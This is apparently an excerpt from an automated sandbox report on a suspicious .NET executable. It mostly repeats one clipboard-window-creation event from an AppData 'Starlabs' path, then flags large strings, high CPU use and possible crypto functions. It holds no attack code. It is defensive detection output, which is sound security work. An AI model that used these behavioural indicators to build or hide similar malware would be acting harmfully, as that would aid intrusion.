Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
.NET source code contains very large strings
Source: 0LpFv1haTA.exe, eK83r.cs Long String: Length: 10266
Source: 0LpFv1haTA.exe.0.dr, eK83r.cs Long String: Length: 10266
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Code function: 0_2_00007FF848F0325A 0_2_00007FF848F0325A
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Code function: 0_2_00007FF848F02E1C 0_2_00007FF848F02E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 7_2_00007FF848F12E1C 7_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 7_2_00007FF848F131C7 7_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F2928A 13_2_00007FF848F2928A
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F131C7 13_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F1B9ED 13_2_00007FF848F1B9ED
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F12E1C 13_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F2A6E2 13_2_00007FF848F2A6E2
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F1DD70 13_2_00007FF848F1DD70
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F238AE 13_2_00007FF848F238AE
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F28B0D 13_2_00007FF848F28B0D
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 40_2_00007FF848F22E1C 40_2_00007FF848F22E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 40_2_00007FF848F2325A 40_2_00007FF848F2325A
